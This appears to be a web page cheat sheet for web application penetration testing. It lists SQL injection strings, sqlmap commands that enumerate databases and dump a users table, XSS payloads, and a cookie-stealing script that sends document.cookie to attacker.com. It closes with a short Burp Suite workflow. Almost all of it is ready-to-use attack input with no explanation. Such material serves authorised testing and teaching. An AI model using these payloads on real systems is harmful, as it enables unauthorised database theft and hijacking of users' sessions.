Back

WEB APPLICATION PENTESTING

SQL Injection

# Manual testing
' OR '1'='1
admin' --
' UNION SELECT NULL--

# SQLMap
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables
sqlmap -u "http://target.com/page.php?id=1" -D database -T users --dump
sqlmap -u "http://target.com/login" --data="user=admin&pass=admin"

XSS (Cross-Site Scripting)

# Basic payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

# Cookie stealing
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>

# XSStrike
xsstrike -u "http://target.com/search?q=test"

Burp Suite Workflow

# Proxy: 127.0.0.1:8080

1. Intercept requests
2. Modify and replay with Repeater
3. Fuzz with Intruder
4. Scan for vulnerabilities
5. Use Spider to map application
🤖 AI Assistant
Ask me about web application security!